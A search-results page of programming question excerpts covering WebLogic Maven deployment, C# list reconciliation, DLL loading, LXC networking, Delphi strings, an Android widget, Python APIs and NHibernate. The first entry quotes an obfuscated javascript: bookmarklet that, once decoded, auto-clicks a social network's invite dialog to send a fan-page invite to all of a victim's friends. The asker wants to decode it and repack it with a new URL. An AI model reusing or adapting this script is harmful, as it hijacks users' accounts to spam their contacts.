Search Results

Search found 5454 results on 219 pages for 'soa purge instances dehyd'.

Page 212/219 | < Previous Page | 208 209 210 211 212 213 214 215 216 217 218 219  | Next Page >

  • Javascript in address bar, how do I decipher?

    - by DoMx
    Hello stackoverflow! I have a javascript code that appears to be encrypted: javascript:var _0xe788=[&quot;\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C&quot;,&quot;\x61\x70\x70\x34\x39\x34\x39\x37\x35\x32\x38\x37\x38\x5F\x62\x6F\x64\x79&quot;,&quot;\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64&quot;,&quot;\x3C\x61\x20\x69\x64\x3D\x22\x73\x75\x67\x67\x65\x73\x74\x22\x20\x68\x72\x65\x66\x3D\x22\x23\x22\x20\x61\x6A\x61\x78\x69\x66\x79\x3D\x22\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70\x3F\x63\x6C\x61\x73\x73\x3D\x46\x61\x6E\x4D\x61\x6E\x61\x67\x65\x72\x26\x61\x6D\x70\x3B\x6E\x6F\x64\x65\x5F\x69\x64\x3D\x31\x31\x36\x38\x37\x38\x34\x39\x34\x39\x39\x32\x36\x35\x37\x22\x20\x63\x6C\x61\x73\x73\x3D\x22\x20\x70\x72\x6F\x66\x69\x6C\x65\x5F\x61\x63\x74\x69\x6F\x6E\x20\x61\x63\x74\x69\x6F\x6E\x73\x70\x72\x6F\x5F\x61\x22\x20\x72\x65\x6C\x3D\x22\x64\x69\x61\x6C\x6F\x67\x2D\x70\x6F\x73\x74\x22\x3E\x53\x75\x67\x67\x65\x73\x74\x20\x74\x6F\x20\x46\x72\x69\x65\x6E\x64\x73\x3C\x2F\x61\x3E&quot;,&quot;\x73\x75\x67\x67\x65\x73\x74&quot;,&quot;\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73&quot;,&quot;\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74&quot;,&quot;\x63\x6C\x69\x63\x6B&quot;,&quot;\x69\x6E\x69\x74\x45\x76\x65\x6E\x74&quot;,&quot;\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74&quot;,&quot;\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C&quot;,&quot;\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D&quot;,&quot;\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70&quot;,&quot;\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67&quot;,&quot;\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x22\x67\x6F\x6F\x67\x6C\x65\x2E\x63\x6F\x6D\x22\x20\x73\x74\x79\x6C\x65\x3D\x22\x77\x69\x64\x74\x68\x3A\x20\x38\x32\x30\x70\x78\x3B\x20\x68\x65\x69\x67\x68\x74\x3A\x20\x36\x30\x30\x70\x78\x3B\x22\x20\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72\x3D\x30\x20\x73\x63\x72\x6F\x6C\x6C\x69\x6E\x67\x3D\x22\x6E\x6F\x22\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E&quot;];var variables=[_0xe788[0],_0xe788[1],_0xe788[2],_0xe788[3],_0xe788[4],_0xe788[5],_0xe788[6],_0xe788[7],_0xe788[8],_0xe788[9],_0xe788[10],_0xe788[11],_0xe788[12],_0xe788[13]]; void (document[variables[2]](variables[1])[variables[0]]=variables[3]);var ss=document[variables[2]](variables[4]);var c=document[variables[6]](variables[5]);c[variables[8]](variables[7],true,true); void ss[variables[9]](c); void setTimeout(function (){fs[variables[10]]();} ,4000); void setTimeout(function (){SocialGraphManager[variables[13]](variables[11],variables[12]);} ,5000); void (document[variables[2]](variables[1])[variables[0]]=_0xe788[14]); I have seen similar instances and I have heard it may be Hex. I have been doing some google research and have found some online deciphers for Hex yet they all seem to struggle decrypting the code. I basically need to decipher this code, change some variables and repack it exactly how I found it but replacing a URL. How can I go about this? Are there any free online tools available? Many thanks.

    Read the article

  • Using Maven to Deploy to Weblogic Clusters

    - by Mark Sailes
    org.codehaus.mojo weblogic-maven-plugin 2.9.1 We're currently using the weblogic maven plugin successfully to deploy to our local WebLogic 9.2 instances. When we try to deploy to a remote environment we have a problem. We use a two machine cluster, with the admin server and managed server on one machine, and another managed server on a seperate machine. When your plugin uploads the application to the admin server, it doesn't copy it to the second managed server on the seperate machine. This then causes the second managed server a problem, as it cannot find the application in the location where the admin server saved it on its own machine. Config below <configuration> <adminServerHostName>${weblogic.adminServerHostName}</adminServerHostName> <adminServerPort>${weblogic.adminServerPort}</adminServerPort> <adminServerProtocol>${weblogic.adminServerProtocol}</adminServerProtocol> <userId>${weblogic.userId}</userId> <password>${weblogic.password}</password> <upload>${weblogic.upload}</upload> <remote>${weblogic.remote}</remote> <verbose>${weblogic.verbose}</verbose> <debug>${weblogic.debug}</debug> <stage>${weblogic.stage}</stage> <targetNames>${weblogic.targetNames}</targetNames> <exploded>${weblogic.exploded}</exploded> </configuration> <profile> <id>localhost</id> <properties> <weblogic.adminServerHostName>localhost</weblogic.adminServerHostName> <weblogic.adminServerPort>7001</weblogic.adminServerPort> <weblogic.adminServerProtocol>t3</weblogic.adminServerProtocol> <weblogic.userId>weblogic</weblogic.userId> <weblogic.password>weblogic</weblogic.password> <weblogic.upload>false</weblogic.upload> <weblogic.remote>false</weblogic.remote> <weblogic.verbose>true</weblogic.verbose> <weblogic.debug>true</weblogic.debug> <weblogic.stage>false</weblogic.stage> <weblogic.targetNames>AdminServer</weblogic.targetNames> <weblogic.exploded>false</weblogic.exploded> </properties> </profile> <profile> <id>dev</id> <properties> <weblogic.adminServerHostName>******</weblogic.adminServerHostName> <weblogic.adminServerPort>9141</weblogic.adminServerPort> <weblogic.adminServerProtocol>t3</weblogic.adminServerProtocol> <weblogic.userId>******</weblogic.userId> <weblogic.password>******</weblogic.password> <weblogic.upload>true</weblogic.upload> <weblogic.remote>true</weblogic.remote> <weblogic.verbose>true</weblogic.verbose> <weblogic.debug>true</weblogic.debug> <weblogic.stage>true</weblogic.stage> <weblogic.targetNames>dev_cluster01</weblogic.targetNames> <weblogic.exploded>false</weblogic.exploded> </properties> </profile>

    Read the article

  • Reconciling a new BindingList into a master BindingList using LINQ

    - by Neo
    I have a seemingly simple problem whereby I wish to reconcile two lists so that an 'old' master list is updated by a 'new' list containing updated elements. Elements are denoted by a key property. These are my requirements: All elements in either list that have the same key results in an assignment of that element from the 'new' list over the original element in the 'old' list only if any properties have changed. Any elements in the 'new' list that have keys not in the 'old' list will be added to the 'old' list. Any elements in the 'old' list that have keys not in the 'new' list will be removed from the 'old' list. I found an equivalent problem here - http://stackoverflow.com/questions/161432/ - but it hasn't really been answered properly. So, I came up with an algorithm to iterate through the old and new lists and perform the reconciliation as per the above. Before anyone asks why I'm not just replacing the old list object with the new list object in its entirety, it's for presentation purposes - this is a BindingList bound to a grid on a GUI and I need to prevent refresh artifacts such as blinking, scrollbars moving, etc. So the list object must remain the same, only its updated elements changed. Another thing to note is that the objects in the 'new' list, even if the key is the same and all the properties are the same, are completely different instances to the equivalent objects in the 'old' list, so copying references is not an option. Below is what I've come up with so far - it's a generic extension method for a BindingList. I've put comments in to demonstrate what I'm trying to do. public static class BindingListExtension { public static void Reconcile<T>(this BindingList<T> left, BindingList<T> right, string key) { PropertyInfo piKey = typeof(T).GetProperty(key); // Go through each item in the new list in order to find all updated and new elements foreach (T newObj in right) { // First, find an object in the new list that shares its key with an object in the old list T oldObj = left.First(call => piKey.GetValue(call, null).Equals(piKey.GetValue(newObj, null))); if (oldObj != null) { // An object in each list was found with the same key, so now check to see if any properties have changed and // if any have, then assign the object from the new list over the top of the equivalent element in the old list foreach (PropertyInfo pi in typeof(T).GetProperties()) { if (!pi.GetValue(oldObj, null).Equals(pi.GetValue(newObj, null))) { left[left.IndexOf(oldObj)] = newObj; break; } } } else { // The object in the new list is brand new (has a new key), so add it to the old list left.Add(newObj); } } // Now, go through each item in the old list to find all elements with keys no longer in the new list foreach (T oldObj in left) { // Look for an element in the new list with a key matching an element in the old list if (right.First(call => piKey.GetValue(call, null).Equals(piKey.GetValue(oldObj, null))) == null) { // A matching element cannot be found in the new list, so remove the item from the old list left.Remove(oldObj); } } } } It can be called like this: _oldBindingList.Reconcile(newBindingList, "MyKey") However, I'm looking for perhaps a method of doing the same using LINQ type methods such as GroupJoin<, Join<, Select<, SelectMany<, Intersect<, etc. So far, the problem I've had is that each of these LINQ type methods result in brand new intermediary lists (as a return value) and really, I only want to modify the existing list for all the above reasons. If anyone can help with this, would be most appreciated. If not, no worries, the above method (as it were) will suffice for now. Thanks, Jason

    Read the article

  • Loading multiple copies of a group of DLLs in the same process

    - by george
    Background I'm maintaining a plugin for an application. I'm Using Visual C++ 2003. The plugin is composed of several DLLs - there's the main DLL, that's the one that the application loads using LoadLibrary, and there are several utility DLLs that are used by the main DLL and by each other. Dependencies generally look like this: plugin.dll - utilA.dll, utilB.dll utilA.dll - utilB.dll utilB.dll - utilA.dll, utilC.dll You get the picture. Some of the dependencies between the DLLs are load-time and some run-time. All the DLL files are stored in the executable's directory (not a requirement, just how it works now). The problem There's a new requirement - running multiple instances of the plugin within the application. The application runs each instance of a plugin in its own thread, i.e. each thread calls The plugin's code, however, is nothing but thread-safe - lots of global variables etc.. Unfortunately, fixing the whole thing isn't currently an option, so I need a way to load multiple (at most 3) copies of the plugin's DLLs in the same process. Option 1: The distinct names approach Creating 3 copies of each DLL file, so that each file has a distinct name. e.g. plugin1.dll, plugin2.dll, plugin3.dll, utilA1.dll, utilA2.dll, utilA3.dll, utilB1.dll, etc.. The application will load plugin1.dll, plugin2.dll and plugin3.dll. The files will be in the executable's directory. For each group of DLLs to know each other by name (so the inter-dependencies work), the names need to be known at compilation time - meaning the DLLs need to be compiled multiple times, only each time with different output file names. Not very complicated, but I'd hate having 3 copies of the VS project files, and don't like having to compile the same files over and over. Option 2: The side-by-side assemblies approach Creating 3 copies of the DLL files, each group in its own directory, and defining each group as an assembly by putting an assembly manifest file in the directory, listing the plugin's DLLs. Each DLL will have an application manifest pointing to the assembly, so that the loader finds the copies of the utility DLLs that reside in the same directory. The manifest needs to be embedded for it to be found when a DLL is loaded using LoadLibrary. I'll use mt.exe from a later VS version for the job, since VS2003 has no built-in manifest embedding support. I've tried this approach with partial success - dependencies are found during load-time of the DLLs, but not when a DLL function is called that loads another DLL. This seems to be the expected behavior according to this article - A DLL's activation context is only used at the DLL's load-time, and afterwards it's deactivated and the process's activation context is used. I haven't yet tried working around this using ISOLATION_AWARE_ENABLED. Questions Got any other options? Any quick & dirty solution will do. :-) Will ISOLATION_AWARE_ENABLED even work with VS2003? Comments will be greatly appreciated. Thanks!

    Read the article

  • wordexp followed by strcpy = EXC_BAD_ACCESS + sharedlibrary apply-load-rules-all

    - by fyngyrz
    The implication is a memory problem. I have static allocations for these: char akdir[400]; char homedir[400]; This crashes on the first strcpy(): void setuplibfoo() { long ii; double x; wordexp_t result; // This obtains the user's home directory // -------------------------------------- homedir[0]=0; // in case wordexp fails switch (wordexp("~/",&result,0)) { case 0: // Successful. We'll fall into deallocate when done. { strcpy(homedir,result.we_wordv[0]); // <<--- CRASH! strcpy(akdir,homedir); strcat(akdir,"ak-plugins/"); vs_status(akdir); } case WRDE_NOSPACE: // If the error was WRDE_NOSPACE, then { // perhaps part of the result was allocated. wordfree (&result); } default: // all other errors do not require deallocation { break; } } ...additional code clipped.. doesn't get there on crash. This is in a shared library I've written that is linked to my application, also something I've written. In this case, it doesn't get very far, although if it starts, it's fine. ...I've read the wordexp docs several times; they say they allocate new objects, so you just set up that type and call them with the address. The switch error model is right from the wordexp docs: http://www.gnu.org/s/libc/manual/html_mono/libc.html#Wordexp-Example It doesn't always crash. Just sometimes, and just under 10.6. Never under 10.5 I'm building debug mode with XCode 3.1.1, under OSX 10.5.8 it seems to run ok, I've not seen a crash -- under 10.6, it crashes... sometimes. But always with that same exception, and always in the same place. The Google has it that this actually means, somehow, that it's too soon to allocate memory. But all the instances I could find were memory errors on the part of the programmer. Overruns, etc. And I can't find any docs on when it IS safe to allocate memory. Now, the path that expands there is nowhere near 400 characters. it's this (it it completes): /Users/flake/ak-plugins/ and this: /Users/flake/ ...if it doesn't. the strcpy... copies 2nd param to first. Theirs to mine. And it works! under 10.5. :/ So is wordexp broke? Is 10.6 broke? Am I cRaZy? Here's the debugger output: 0x00013446 <+0049> call 0xc98da <dyld_stub_wordexp> 0x0001344b <+0054> test %eax,%eax 0x0001344d <+0056> je 0x13454 <setuplibfoo+63> 0x0001344f <+0058> jmp 0x134da <setuplibfoo+197> 0x00013454 <+0063> mov -0x1c(%ebp),%eax 0x00013457 <+0066> mov (%eax),%eax 0x00013459 <+0068> mov %eax,0x4(%esp) 0x0001345d <+0072> lea 0xb6cc2(%ebx),%eax 0x00013463 <+0078> mov (%eax),%eax 0x00013465 <+0080> mov %eax,(%esp) 0x00013468 <+0083> call 0xc9898 <dyld_stub_strcpy> 0x0001346d <+0088> lea 0xb6cc2(%ebx),%eax <<--CRASH!

    Read the article

  • LXC Container Networking

    - by digitaladdictions
    I just started to experiment with LXC containers. I was able to create a container and start it up but I cannot get dhcp to assign the container an IP address. If I assign a static address the container can ping the host IP but not outside the host IP. The host is CentOS 6.5 and the guest is Ubuntu 14.04LTS. I used the template downloaded by lxc-create -t download -n cn-01 command. If I am trying to get an IP address on the same subnet as the host I don't believe I should need the IP tables rule for masquerading but I added it anyways. Same with IP forwarding. I compiled LXC by hand from the following source https://linuxcontainers.org/downloads/lxc-1.0.4.tar.gz Host Operating System Version #> cat /etc/redhat-release CentOS release 6.5 (Final) #> uname -a Linux localhost.localdomain 2.6.32-431.20.3.el6.x86_64 #1 SMP Thu Jun 19 21:14:45 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux Container Config #> cat /usr/local/var/lib/lxc/cn-01/config # Template used to create this container: /usr/local/share/lxc/templates/lxc-download # Parameters passed to the template: # For additional config options, please look at lxc.container.conf(5) # Distribution configuration lxc.include = /usr/local/share/lxc/config/ubuntu.common.conf lxc.arch = x86_64 # Container specific configuration lxc.rootfs = /usr/local/var/lib/lxc/cn-01/rootfs lxc.utsname = cn-01 # Network configuration lxc.network.type = veth lxc.network.flags = up lxc.network.link = br0 LXC default.confu 1500 qdisc pfifo_fast state UP qlen 1000 link/ether 00:0c:29:12:30:f2 brd ff:ff:ff:ff:f #> cat /usr/local/etc/lxc/default.conf lxc.network.type = veth lxc.network.link = br0 lxc.network.flags = up #> lxc-checkconfig Kernel configuration not found at /proc/config.gz; searching... Kernel configuration found at /boot/config-2.6.32-431.20.3.el6.x86_64 --- Namespaces --- Namespaces: enabled Utsname namespace: enabled Ipc namespace: enabled Pid namespace: enabled User namespace: enabled Network namespace: enabled Multiple /dev/pts instances: enabled --- Control groups --- Cgroup: enabled Cgroup namespace: enabled Cgroup device: enabled Cgroup sched: enabled Cgroup cpu account: enabled Cgroup memory controller: /usr/local/bin/lxc-checkconfig: line 103: [: too many arguments enabled Cgroup cpuset: enabled --- Misc --- Veth pair device: enabled Macvlan: enabled Vlan: enabled File capabilities: /usr/local/bin/lxc-checkconfig: line 118: [: -gt: unary operator expected Note : Before booting a new kernel, you can check its configuration usage : CONFIG=/path/to/config /usr/local/bin/lxc-checkconfig Network Config (HOST) #> cat /etc/sysconfig/network-scripts/ifcfg-br0 DEVICE=br0 TYPE=Bridge BOOTPROTO=dhcp ONBOOT=yes #> cat /etc/sysconfig/network-scripts/ifcfg-eth0 DEVICE=eth0 ONBOOT=yes TYPE=Ethernet IPV6INIT=no USERCTL=no BRIDGE=br0 #> cat /etc/networks default 0.0.0.0 loopback 127.0.0.0 link-local 169.254.0.0 #> ip a s 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo inet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000 link/ether 00:0c:29:12:30:f2 brd ff:ff:ff:ff:ff:ff inet6 fe80::20c:29ff:fe12:30f2/64 scope link valid_lft forever preferred_lft forever 3: pan0: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN link/ether 42:7e:43:b3:61:c5 brd ff:ff:ff:ff:ff:ff 4: br0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UNKNOWN link/ether 00:0c:29:12:30:f2 brd ff:ff:ff:ff:ff:ff inet 10.60.70.121/24 brd 10.60.70.255 scope global br0 inet6 fe80::20c:29ff:fe12:30f2/64 scope link valid_lft forever preferred_lft forever 12: vethT6BGL2: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000 link/ether fe:a1:69:af:50:17 brd ff:ff:ff:ff:ff:ff inet6 fe80::fca1:69ff:feaf:5017/64 scope link valid_lft forever preferred_lft forever #> brctl show bridge name bridge id STP enabled interfaces br0 8000.000c291230f2 no eth0 vethT6BGL2 pan0 8000.000000000000 no #> cat /proc/sys/net/ipv4/ip_forward 1 # Generated by iptables-save v1.4.7 on Fri Jul 11 15:11:36 2014 *nat :PREROUTING ACCEPT [34:6287] :POSTROUTING ACCEPT [0:0] :OUTPUT ACCEPT [0:0] -A POSTROUTING -o eth0 -j MASQUERADE COMMIT # Completed on Fri Jul 11 15:11:36 2014 Network Config (Container) #> cat /etc/network/interfaces # This file describes the network interfaces available on your system # and how to activate them. For more information, see interfaces(5). # The loopback network interface auto lo iface lo inet loopback auto eth0 iface eth0 inet dhcp #> ip a s 11: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000 link/ether 02:69:fb:42:ee:d7 brd ff:ff:ff:ff:ff:ff inet6 fe80::69:fbff:fe42:eed7/64 scope link valid_lft forever preferred_lft forever 13: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo inet6 ::1/128 scope host valid_lft forever preferred_lft forever

    Read the article

  • String Sharing/Reference issue with objects in Delphi

    - by jenakai123
    My application builds many objects in memory based on filenames (among other string based information). I was hoping to optimise memory usage by storing the path and filename separately, and then sharing the path between objects in the same path. I wasn't trying to look at using a string pool or anything, basically my objects are sorted so if I have 10 objects with the same path I want objects 2-10 to have their path "pointed" at object 1's path (eg object[2].Path=object[1].Path); I have a problem though, I don't believe that my objects are in fact sharing a reference to the same string after I think I am telling them to (by the object[2].Path=object[1].Path assignment). When I do an experiment with a string list and set all the values to point to the first value in the list I can see the "memory conservation" in action, but when I use objects I see absolutely no change at all, admittedly I am only using task manager (private working set) to watch for memory use changes. Here's a contrived example, I hope this makes sense. I have an object: TfileObject=class(Tobject) FpathPart: string; FfilePart: string; end; Now I create 1,000,000 instances of the object, using a new string for each one: var x: integer; MyFilePath: string; fo: TfileObject; begin for x := 1 to 1000000 do begin // create a new string for every iteration of the loop MyFilePath:=ExtractFilePath(Application.ExeName); fo:=TfileObject.Create; fo.FpathPart:=MyFilePath; FobjectList.Add(fo); end; end; Run this up and task manager says I am using 68MB of memory or something. (Note that if I allocated MyFilePath outside of the loop then I do save memory because of 1 instance of the string, but this is a contrived example and not actually how it would happen in the app). Now I want to "optimise" my memory usage by making all objects share the same instance of the path string, since it's the same value: var x: integer; begin for x:=1 to FobjectList.Count-1 do begin TfileObject(FobjectList[x]).FpathPart:=TfileObject(FobjectList[0]).FpathPart; end; end; Task Manager shows absouletly no change. However if I do something similar with a TstringList: var x: integer; begin for x := 1 to 1000000 do begin FstringList.Add(ExtractFilePath(Application.ExeName)); end; end; Task Manager says 60MB memory use. Now optimise with: var x: integer; begin for x := 1 to FstringList.Count - 1 do FstringList[x]:=FstringList[0]; end; Task Manager shows the drop in memory usage that I would expect, now 10MB. So I seem to be able to share strings in a string list, but not in objects. I am obviously missing something conceptually, in code or both! I hope this makes sense, I can really see the ability to conserve memory using this technique as I have a lot of objects all with lots of string information, that data is sorted in many different ways and I would like to be able to iterate over this data once it is loaded into memory and free some of that memory back up again by sharing strings in this way. Thanks in advance for any assistance you can offer.

    Read the article

  • Accessing Layout Items from inside Widget AppWidgetProvider

    - by cam4mav
    I am starting to go insane trying to figure this out. It seems like it should be very easy, I'm starting to wonder if it's possible. What I am trying to do is create a home screen widget, that only contains an ImageButton. When it is pressed, the idea is to change some setting (like the wi-fi toggle) and then change the Buttons image. I have the ImageButton declared like this in my main.xml <ImageButton android:id="@+id/buttonOne" android:src="@drawable/button_normal_ringer" android:layout_width="wrap_content" android:layout_height="wrap_content" android:layout_gravity="center" /> my AppWidgetProvider class, named ButtonWidget * note that the RemoteViews class is a locally stored variable. this allowed me to get access to the RViews layout elements... or so I thought. @Override public void onUpdate(Context context, AppWidgetManager appWidgetManager, int[] appWidgetIds) { remoteViews = new RemoteViews(context.getPackageName(), R.layout.main); Intent active = new Intent(context, ButtonWidget.class); active.setAction(VIBRATE_UPDATE); active.putExtra("msg","TESTING"); PendingIntent actionPendingIntent = PendingIntent.getBroadcast(context, 0, active, 0); remoteViews.setOnClickPendingIntent(R.id.buttonOne, actionPendingIntent); appWidgetManager.updateAppWidget(appWidgetIds, remoteViews); } @Override public void onReceive(Context context, Intent intent) { // v1.5 fix that doesn't call onDelete Action final String action = intent.getAction(); Log.d("onReceive",action); if (AppWidgetManager.ACTION_APPWIDGET_DELETED.equals(action)) { final int appWidgetId = intent.getExtras().getInt( AppWidgetManager.EXTRA_APPWIDGET_ID, AppWidgetManager.INVALID_APPWIDGET_ID); if (appWidgetId != AppWidgetManager.INVALID_APPWIDGET_ID) { this.onDeleted(context, new int[] { appWidgetId }); } } else { // check, if our Action was called if (intent.getAction().equals(VIBRATE_UPDATE)) { String msg = "null"; try { msg = intent.getStringExtra("msg"); } catch (NullPointerException e) { Log.e("Error", "msg = null"); } Log.d("onReceive",msg); if(remoteViews != null){ Log.d("onReceive",""+remoteViews.getLayoutId()); remoteViews.setImageViewResource(R.id.buttonOne, R.drawable.button_pressed_ringer); Log.d("onReceive", "tried to switch"); } else{ Log.d("F!", "--naughty language used here!!!--"); } } super.onReceive(context, intent); } } so, I've been testing this and the onReceive method works great, I'm able to send notifications and all sorts of stuff (removed from code for ease of reading) the one thing I can't do is change any properties of the view elements. To try and fix this, I made RemoteViews a local and static private variable. Using log's I was able to see that When multiple instances of the app are on screen, they all refer to the one instance of RemoteViews. perfect for what I'm trying to do The trouble is in trying to change the image of the ImageButton. I can do this from within the onUpdate method using this. remoteViews.setImageViewResource(R.id.buttonOne, R.drawable.button_pressed_ringer); that doesn't do me any good though once the widget is created. For some reason, even though its inside the same class, being inside the onReceive method makes that line not work. That line used to throw a Null pointer as a matter of fact, until I changed the variable to static. now it passes the null test, refers to the same layoutId as it did at the start, reads the line, but it does nothing. Its like the code isn't even there, just keeps chugging along. SO...... Is there any way to modify layout elements from within a widget after the widget has been created!? I want to do this based on the environment, not with a configuration activity launch. I've been looking at various questions and this seems to be an issue that really hasn't been solved, such as link text and link text oh and for anyone who finds this and wants a good starting tutorial for widgets, this is easy to follow (though a bit old, it gets you comfortable with widgets) .pdf link text hopefully someone can help here. I kinda have the feeling that this is illegal and there is a different way to go about this. I would LOVE to be told another approach!!!! Thanks

    Read the article

  • hosting simple python scripts in a container to handle concurrency, configuration, caching, etc.

    - by Justin Grant
    My first real-world Python project is to write a simple framework (or re-use/adapt an existing one) which can wrap small python scripts (which are used to gather custom data for a monitoring tool) with a "container" to handle boilerplate tasks like: fetching a script's configuration from a file (and keeping that info up to date if the file changes and handle decryption of sensitive config data) running multiple instances of the same script in different threads instead of spinning up a new process for each one expose an API for caching expensive data and storing persistent state from one script invocation to the next Today, script authors must handle the issues above, which usually means that most script authors don't handle them correctly, causing bugs and performance problems. In addition to avoiding bugs, we want a solution which lowers the bar to create and maintain scripts, especially given that many script authors may not be trained programmers. Below are examples of the API I've been thinking of, and which I'm looking to get your feedback about. A scripter would need to build a single method which takes (as input) the configuration that the script needs to do its job, and either returns a python object or calls a method to stream back data in chunks. Optionally, a scripter could supply methods to handle startup and/or shutdown tasks. HTTP-fetching script example (in pseudocode, omitting the actual data-fetching details to focus on the container's API): def run (config, context, cache) : results = http_library_call (config.url, config.http_method, config.username, config.password, ...) return { html : results.html, status_code : results.status, headers : results.response_headers } def init(config, context, cache) : config.max_threads = 20 # up to 20 URLs at one time (per process) config.max_processes = 3 # launch up to 3 concurrent processes config.keepalive = 1200 # keep process alive for 10 mins without another call config.process_recycle.requests = 1000 # restart the process every 1000 requests (to avoid leaks) config.kill_timeout = 600 # kill the process if any call lasts longer than 10 minutes Database-data fetching script example might look like this (in pseudocode): def run (config, context, cache) : expensive = context.cache["something_expensive"] for record in db_library_call (expensive, context.checkpoint, config.connection_string) : context.log (record, "logDate") # log all properties, optionally specify name of timestamp property last_date = record["logDate"] context.checkpoint = last_date # persistent checkpoint, used next time through def init(config, context, cache) : cache["something_expensive"] = get_expensive_thing() def shutdown(config, context, cache) : expensive = cache["something_expensive"] expensive.release_me() Is this API appropriately "pythonic", or are there things I should do to make this more natural to the Python scripter? (I'm more familiar with building C++/C#/Java APIs so I suspect I'm missing useful Python idioms.) Specific questions: is it natural to pass a "config" object into a method and ask the callee to set various configuration options? Or is there another preferred way to do this? when a callee needs to stream data back to its caller, is a method like context.log() (see above) appropriate, or should I be using yield instead? (yeild seems natural, but I worry it'd be over the head of most scripters) My approach requires scripts to define functions with predefined names (e.g. "run", "init", "shutdown"). Is this a good way to do it? If not, what other mechanism would be more natural? I'm passing the same config, context, cache parameters into every method. Would it be better to use a single "context" parameter instead? Would it be better to use global variables instead? Finally, are there existing libraries you'd recommend to make this kind of simple "script-running container" easier to write?

    Read the article

  • How to select chosen columns from two different entities into one DTO using NHibernate?

    - by Pawel Krakowiak
    I have two classes (just recreating the problem): public class User { public virtual int Id { get; set; } public virtual string FirstName { get; set; } public virtual string LastName { get; set; } public virtual IList<OrgUnitMembership> OrgUnitMemberships { get; set; } } public class OrgUnitMembership { public virtual int UserId { get; set; } public virtual int OrgUnitId { get; set; } public virtual DateTime JoinDate { get; set; } public virtual DateTime LeaveDate { get; set; } } There's a Fluent NHibernate map for both, of course: public class UserMapping : ClassMap<User> { public UserMapping() { Table("Users"); Id(e => e.Id).GeneratedBy.Identity(); Map(e => e.FirstName); Map(e => e.LastName); HasMany(x => x.OrgUnitMemberships) .KeyColumn(TypeReflector<OrgUnitMembership> .GetPropertyName(p => p.UserId))).ReadOnly().Inverse(); } } public class OrgUnitMembershipMapping : ClassMap<OrgUnitMembership> { public OrgUnitMembershipMapping() { Table("OrgUnitMembership"); CompositeId() .KeyProperty(x=>x.UserId) .KeyProperty(x=>x.OrgUnitId); Map(x => x.JoinDate); Map(x => x.LeaveDate); References(oum => oum.OrgUnit) .Column(TypeReflector<OrgUnitMembership> .GetPropertyName(oum => oum.OrgUnitId)).ReadOnly(); References(oum => oum.User) .Column(TypeReflector<OrgUnitMembership> .GetPropertyName(oum => oum.UserId)).ReadOnly(); } } What I want to do is to retrieve some users based on criteria, but I would like to combine all columns from the Users table with some columns from the OrgUnitMemberships table, analogous to a SQL query: select u.*, m.JoinDate, m.LeaveDate from Users u inner join OrgUnitMemberships m on u.Id = m.UserId where m.OrgUnitId = :ouid I am totally lost, I tried many different options. Using a plain SQL query almost works, but because there are some nullable enums in the User class AliasToBean fails to transform, otherwise wrapping a SQL query would work like this: return Session .CreateSQLQuery(sql) .SetParameter("ouid", orgUnitId) .SetResultTransformer(Transformers.AliasToBean<UserDTO>()) .List<UserDTO>() I tried the code below as a test (a few different variants), but I'm not sure what I'm doing. It works partially, I get instances of UserDTO back, the properties coming from OrgUnitMembership (dates) are filled, but all properties from User are null: User user = null; OrgUnitMembership membership = null; UserDTO dto = null; var users = Session.QueryOver(() => user) .SelectList(list => list .Select(() => user.Id) .Select(() => user.FirstName) .Select(() => user.LastName)) .JoinAlias(u => u.OrgUnitMemberships, () => membership) //.JoinQueryOver<OrgUnitMembership>(u => u.OrgUnitMemberships) .SelectList(list => list .Select(() => membership.JoinDate).WithAlias(() => dto.JoinDate) .Select(() => membership.LeaveDate).WithAlias(() => dto.LeaveDate)) .TransformUsing(Transformers.AliasToBean<UserDTO>()) .List<UserDTO>();

    Read the article

  • Codeigniter: Controller URI with Library

    - by Kevin Brown
